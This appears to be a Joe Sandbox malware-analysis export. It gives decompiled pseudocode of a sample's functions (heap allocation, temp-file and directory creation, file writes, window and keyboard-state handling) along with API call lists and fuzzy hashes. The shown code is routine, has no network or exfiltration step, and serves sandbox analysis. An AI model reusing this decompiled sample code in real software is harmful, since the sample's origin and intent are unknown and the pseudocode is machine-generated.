                                                                                                                                                              				void* _t62;
                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              
                                                                                                                                                              				_t71 = __eflags;
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_v20 = E00403DC0(0x400);
                                                                                                                                                              				_t15 =  *0x40b3b0; // 0x0
                                                                                                                                                              				E00405EB2(_t71, _t15);
                                                                                                                                                              				_t60 = _t15;
                                                                                                                                                              				E004030F0( &_v20, _t60);
                                                                                                                                                              				GetTempFileNameA(_v20, 0x40a00d, 0, _v24);
                                                                                                                                                              				_t19 =  *0x40b3b0; // 0x0
                                                                                                                                                              				E00403E50(_v24, _t19);
                                                                                                                                                              				_t61 = _t19;
                                                                                                                                                              				E004030F0(0x40b12c, _t61);
                                                                                                                                                              				E00403E30( *_t69);
                                                                                                                                                              				E00405EA0( *0x40b12c); // executed
                                                                                                                                                              				E00405F13( *0x40b12c);
                                                                                                                                                              				_t25 =  *0x40b3b0; // 0x0
                                                                                                                                                              				E00405DD5(_t71, _t25);
                                                                                                                                                              				_t62 = _t25;
                                                                                                                                                              				E004030F0(0x40b124, _t62);
                                                                                                                                                              				_push(E00403EA0(_v28));
                                                                                                                                                              				if(0 !=  *_t69) {
                                                                                                                                                              					__eflags = 1 - _v20;
                                                                                                                                                              					if(1 == _v20) {
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					if(E00403EA0(_a4 + 1) == 1) {
                                                                                                                                                              						_push( *0x40b3b0);
                                                                                                                                                              						E004074F0(0x40a00e);
                                                                                                                                                              						_t66 =  *0x40b124; // 0x2260488
                                                                                                                                                              						E004074F0(_t66);
                                                                                                                                                              						E004074F0(0x40a011);
                                                                                                                                                              						_pop(_t68);
                                                                                                                                                              						E004030F0(0x40b128, _t68);
                                                                                                                                                              					}
                                                                                                                                                              					_t63 =  *0x40b12c; // 0x2264840
                                                                                                                                                              					_push( *0x40b3b0);
                                                                                                                                                              					E004074F0(_t63);
                                                                                                                                                              					_pop(_t64);
                                                                                                                                                              					E004030F0(0x40b124, _t64);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              				}
                                                                                                                                                              				 *0x40b11c = E00403EA0(_a4 + _v8);
                                                                                                                                                              				 *0x40b120 = E00403EA0(_a4 + _v8 + 1);
                                                                                                                                                              				return E00407550(1, _v12);
                                                                                                                                                              			}




















                                                                                                                                                              0x00401bdd
                                                                                                                                                              0x00401be0
                                                                                                                                                              0x00401be1
                                                                                                                                                              0x00401be2
                                                                                                                                                              0x00401bed
                                                                                                                                                              0x00401bf0
                                                                                                                                                              0x00401bf7
                                                                                                                                                              0x00401c00
                                                                                                                                                              0x00401c01
                                                                                                                                                              0x00401c17
                                                                                                                                                              0x00401c1c
                                                                                                                                                              0x00401c27
                                                                                                                                                              0x00401c32
                                                                                                                                                              0x00401c33
                                                                                                                                                              0x00401c3b
                                                                                                                                                              0x00401c46
                                                                                                                                                              0x00401c51
                                                                                                                                                              0x00401c56
                                                                                                                                                              0x00401c5d
                                                                                                                                                              0x00401c68
                                                                                                                                                              0x00401c69
                                                                                                                                                              0x00401c77
                                                                                                                                                              0x00401c7d
                                                                                                                                                              0x00401cef
                                                                                                                                                              0x00401cf2
                                                                                                                                                              0x00401cf4
                                                                                                                                                              0x00401cf4
                                                                                                                                                              0x00401c7f
                                                                                                                                                              0x00401c90
                                                                                                                                                              0x00401c92
                                                                                                                                                              0x00401c9d
                                                                                                                                                              0x00401ca2
                                                                                                                                                              0x00401ca8
                                                                                                                                                              0x00401cb2
                                                                                                                                                              0x00401cbd
                                                                                                                                                              0x00401cbe
                                                                                                                                                              0x00401cbe
                                                                                                                                                              0x00401cc3
                                                                                                                                                              0x00401cc9
                                                                                                                                                              0x00401ccf
                                                                                                                                                              0x00401cda
                                                                                                                                                              0x00401cdb
                                                                                                                                                              0x00401ce0
                                                                                                                                                              0x00401ce0
                                                                                                                                                              0x00401d0c
                                                                                                                                                              0x00401d21
                                                                                                                                                              0x00401d3c

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00470000,00000008,00000000), ref: 00403DD1
                                                                                                                                                                • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                                                                                                                                                • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                                                                                                                                                • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                                                                                                                                                • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                                                                                                                                                • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000,00000000,00000000), ref: 00401C17
                                                                                                                                                                • Part of subcall function 00403E50: memcpy.MSVCRT ref: 00403E83
                                                                                                                                                                • Part of subcall function 00403E30: HeapFree.KERNEL32(00470000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                                                                                                                                                • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                                                                                                                                                • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                                                                                                                                                • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                                                                                                                                                • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C62,00000000,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                                                                                                                                                • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4243183096-0
                                                                                                                                                              • Opcode ID: c3464696806c0409d0bb8dbf5b053a24e4728aea5873732a0615b8c1c001ca45
                                                                                                                                                              • Instruction ID: 2dff8fe517095d79ad9ad3ab911cbcc41af86ea3352296ed8cd7210842124807
                                                                                                                                                              • Opcode Fuzzy Hash: c3464696806c0409d0bb8dbf5b053a24e4728aea5873732a0615b8c1c001ca45
                                                                                                                                                              • Instruction Fuzzy Hash: 823143701182009FD300FF65ED92E6B7BA9EB48305F10883EF581B61A7C73DA9519B9E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 636 407750-40776d 637 4077a2-4077bf 636->637 638 40776f-40779d RtlReAllocateHeap 636->638 638->637
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00407750(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              
                                                                                                                                                              				_t10 =  *0x40b3b0; // 0x0
                                                                                                                                                              				_v12 = _t10 + _a4;
                                                                                                                                                              				_t18 =  *0x40b444; // 0x4104
                                                                                                                                                              				if(_v12 >= _t18 - 4) {
                                                                                                                                                              					 *0x40b444 = _v12 + 0x4000;
                                                                                                                                                              					_t15 =  *0x40b444; // 0x4104
                                                                                                                                                              					_t22 =  *0x40a390; // 0x22606f0
                                                                                                                                                              					_t25 =  *0x40b3b4; // 0x2260000
                                                                                                                                                              					_t17 = RtlReAllocateHeap(_t25, 1, _t22, _t15 + 5); // executed
                                                                                                                                                              					 *0x40a390 = _t17;
                                                                                                                                                              				}
                                                                                                                                                              				_t12 =  *0x40a390; // 0x22606f0
                                                                                                                                                              				_v8 = _t12 + _a8;
                                                                                                                                                              				 *0x40b3b0 = _a8 + _a4;
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}












                                                                                                                                                              0x00407756
                                                                                                                                                              0x0040775e
                                                                                                                                                              0x00407761
                                                                                                                                                              0x0040776d
                                                                                                                                                              0x00407778
                                                                                                                                                              0x0040777e
                                                                                                                                                              0x00407787
                                                                                                                                                              0x00407790
                                                                                                                                                              0x00407797
                                                                                                                                                              0x0040779d
                                                                                                                                                              0x0040779d
                                                                                                                                                              0x004077a2
                                                                                                                                                              0x004077aa
                                                                                                                                                              0x004077b3
                                                                                                                                                              0x004077bf

                                                                                                                                                              APIs
                                                                                                                                                              • RtlReAllocateHeap.NTDLL(02260000,00000001,022606F0,000040FF), ref: 00407797
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                                                                                                                                              • Instruction ID: 28936eabe9b6fdea5660807dec5754b311fbf5a963c992916f66545fa0493ef0
                                                                                                                                                              • Opcode Fuzzy Hash: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                                                                                                                                              • Instruction Fuzzy Hash: F301C975900208EFC708CF58EE95A597BB4FB88308B108179ED09A7356D730AA60CB9E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 639 4030a0-4030bd RtlAllocateHeap 640 4030e7-4030ed 639->640 641 4030bf-4030e4 639->641 641->640
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004030A0(void* __eax, signed int _a4, intOrPtr _a8) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              
                                                                                                                                                              				_push(__eax);
                                                                                                                                                              				_t14 = RtlAllocateHeap( *0x40b0f8, 8, _a4 * (__eax + 1) + 0x18); // executed
                                                                                                                                                              				_pop(_t19);
                                                                                                                                                              				_t15 = _t14;
                                                                                                                                                              				if(_t15 != 0) {
                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x10)) = _t19;
                                                                                                                                                              					 *((intOrPtr*)(_t15 + 4)) = _v4;
                                                                                                                                                              					 *((intOrPtr*)(_t15 + 8)) = _v0;
                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xc)) = _a4;
                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x14)) = _a8;
                                                                                                                                                              					 *_t15 = 1;
                                                                                                                                                              					_t15 = _t15 + 0x18;
                                                                                                                                                              				}
                                                                                                                                                              				 *_a4 = _t15;
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}








                                                                                                                                                              0x004030a0
                                                                                                                                                              0x004030b5
                                                                                                                                                              0x004030ba
                                                                                                                                                              0x004030bb
                                                                                                                                                              0x004030bd
                                                                                                                                                              0x004030bf
                                                                                                                                                              0x004030c6
                                                                                                                                                              0x004030cd
                                                                                                                                                              0x004030d4
                                                                                                                                                              0x004030db
                                                                                                                                                              0x004030de
                                                                                                                                                              0x004030e4
                                                                                                                                                              0x004030e4
                                                                                                                                                              0x004030eb
                                                                                                                                                              0x004030ed

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                                                                                                                                              • Instruction ID: 460cff1aebd5c89f6a466e3c7b53c8f2e2deecb765fd07c7d01cf3f68e72b86a
                                                                                                                                                              • Opcode Fuzzy Hash: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                                                                                                                                              • Instruction Fuzzy Hash: 91F0BCB1604701AFC308CF05C940A0BFBE6EFC8311F15C96AE4989B36AE775D842CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405F90(void** _a4) {
                                                                                                                                                              				long _v4;
                                                                                                                                                              				void** _t20;
                                                                                                                                                              
                                                                                                                                                              				_t20 = _a4;
                                                                                                                                                              				_v4 = 0;
                                                                                                                                                              				if(_t20[5] == 0) {
                                                                                                                                                              					WriteFile( *_t20, _t20[1], _t20[2] - _t20[3],  &_v4, 0); // executed
                                                                                                                                                              					_t20[3] = _t20[2];
                                                                                                                                                              					return _v4;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}





                                                                                                                                                              0x00405f92
                                                                                                                                                              0x00405f9b
                                                                                                                                                              0x00405f9f
                                                                                                                                                              0x00405fb5
                                                                                                                                                              0x00405fc2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405fc2
                                                                                                                                                              0x00405fc7

                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                                                                                                                                              • Instruction ID: 772ef9aa7f968d4b686b07dbd3a32be2510b3ef25a50012a320cac0da8777639
                                                                                                                                                              • Opcode Fuzzy Hash: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                                                                                                                                              • Instruction Fuzzy Hash: DAE0AEB6515701AFC324CF68C948C67F7F8EB88610B00C92EA89A93A00E630F840CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406807() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				_t1 = HeapCreate(0, 0x400, 0); // executed
                                                                                                                                                              				 *0x40b440 = _t1;
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x00406810
                                                                                                                                                              0x00406816
                                                                                                                                                              0x0040681b

                                                                                                                                                              APIs
                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                              • Opcode ID: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                                                                                                                                              • Instruction ID: a1970917e828b1c725cfc33b77b9c06a1eec18c1769a3480f2e18b6e12359080
                                                                                                                                                              • Opcode Fuzzy Hash: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                                                                                                                                              • Instruction Fuzzy Hash: FDB011B0280300ABE2200F20AE0AB003A20B300B0AF200020F300B82E0CBB020208A0E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403D90() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				_t1 = HeapCreate(0, 0x1000, 0); // executed
                                                                                                                                                              				 *0x40b404 = _t1;
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x00403d99
                                                                                                                                                              0x00403d9f
                                                                                                                                                              0x00403da4

                                                                                                                                                              APIs
                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                              • Opcode ID: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                                                                                                                                              • Instruction ID: eae18f8d58a2e4a3b1d5f4302a4f812a2dd08b0a1b01d317368b01850db83572
                                                                                                                                                              • Opcode Fuzzy Hash: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                                                                                                                                              • Instruction Fuzzy Hash: EDB0127029134056E2100F105E06B003930A304B43F100020F340792D6C7F01040450D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00405D3C(void* __ecx, struct HWND__* _a4) {
                                                                                                                                                              				char _v12;
                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                              				int _t18;
                                                                                                                                                              
                                                                                                                                                              				if(GetKeyState(9) >= 0 || GetKeyState(0x11) < 0 || GetKeyState(0x10) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					if(GetPropA(_a4, "PB_WindowID") == 0) {
                                                                                                                                                              						goto L8;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t9 =  *((intOrPtr*)(E00406690( *0x40b42c, _t8 - 1) + 8));
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					GetClassNameA(GetFocus(),  &_v12, 5);
                                                                                                                                                              					_push(4);
                                                                                                                                                              					_t18 =  &_v12;
                                                                                                                                                              					_push("Rich");
                                                                                                                                                              					_push(_t18);
                                                                                                                                                              					L00407DF0();
                                                                                                                                                              					if(_t18 != 0 || (SendMessageA(GetFocus(), 0x44e, _t18, _t18) & 0x00000800) != 0) {
                                                                                                                                                              						goto L6;
                                                                                                                                                              					} else {
                                                                                                                                                              						L8:
                                                                                                                                                              						_t9 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t9;
                                                                                                                                                              			}






                                                                                                                                                              0x00405d4e
                                                                                                                                                              0x00405daa
                                                                                                                                                              0x00405dba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405dbc
                                                                                                                                                              0x00405dc9
                                                                                                                                                              0x00405dc9
                                                                                                                                                              0x00405d68
                                                                                                                                                              0x00405d77
                                                                                                                                                              0x00405d7d
                                                                                                                                                              0x00405d7f
                                                                                                                                                              0x00405d82
                                                                                                                                                              0x00405d87
                                                                                                                                                              0x00405d88
                                                                                                                                                              0x00405d92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405dce
                                                                                                                                                              0x00405dce
                                                                                                                                                              0x00405dce
                                                                                                                                                              0x00405dce
                                                                                                                                                              0x00405d92
                                                                                                                                                              0x00405dd2

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: State$Focus$ClassMessageNamePropSend_strncoll
                                                                                                                                                              • String ID: PB_WindowID$Rich
                                                                                                                                                              • API String ID: 4045516979-1396934994
                                                                                                                                                              • Opcode ID: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                                                                                                                                              • Instruction ID: 77dc2629d62e80cb4dd25d6b8617fe52c6faf744ad0dfdb0d38b69dd5d3036f9
                                                                                                                                                              • Opcode Fuzzy Hash: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                                                                                                                                              • Instruction Fuzzy Hash: 940125715007286AEE006BA0DD09FAB2F6CEF10744F008037B901F70D6D679A855DAA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E00404714(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                              				long _t14;
                                                                                                                                                              				intOrPtr* _t20;
                                                                                                                                                              				struct HWND__* _t28;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t28 = _a4;
                                                                                                                                                              				_t14 = GetWindowLongA(_t28, 0xfffffff4);
                                                                                                                                                              				_t27 = _t14;
                                                                                                                                                              				if(_t14 == 0xffffffff) {
                                                                                                                                                              					return  *0x40a7b4(_t28, _a8, _a12, _a16);
                                                                                                                                                              				}
                                                                                                                                                              				_t30 = E00406690( *0x40b424, _t27);
                                                                                                                                                              				_a16 = CallWindowProcA( *(_t30 + 0xc), _t28, _a8, _a12, _a16);
                                                                                                                                                              				if(_a8 == 0x82) {
                                                                                                                                                              					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)) + 0xc));
                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                              						 *_t20(_t30);
                                                                                                                                                              					}
                                                                                                                                                              					RemovePropA(_t28, "PB_ID");
                                                                                                                                                              					if(RemovePropA(_t28, "PB_DropAccept") != 0) {
                                                                                                                                                              						 *0x40a878(_t28);
                                                                                                                                                              					}
                                                                                                                                                              					SetWindowLongA(_t28, 0xfffffff4, 0xffffffff);
                                                                                                                                                              					E004066BB( *0x40b424, _t27);
                                                                                                                                                              				}
                                                                                                                                                              				return _a16;
                                                                                                                                                              			}







                                                                                                                                                              0x00404719
                                                                                                                                                              0x0040471f
                                                                                                                                                              0x00404725
                                                                                                                                                              0x0040472a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004047af
                                                                                                                                                              0x0040473c
                                                                                                                                                              0x00404755
                                                                                                                                                              0x00404758
                                                                                                                                                              0x0040475d
                                                                                                                                                              0x00404762
                                                                                                                                                              0x00404765
                                                                                                                                                              0x00404765
                                                                                                                                                              0x00404773
                                                                                                                                                              0x0040477f
                                                                                                                                                              0x00404782
                                                                                                                                                              0x00404782
                                                                                                                                                              0x0040478d
                                                                                                                                                              0x0040479a
                                                                                                                                                              0x0040479a
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                                                                                                                                              • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                                                                                                                                              • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                                                                                                                                              • RevokeDragDrop.OLE32(?), ref: 00404782
                                                                                                                                                              • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                                                                                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
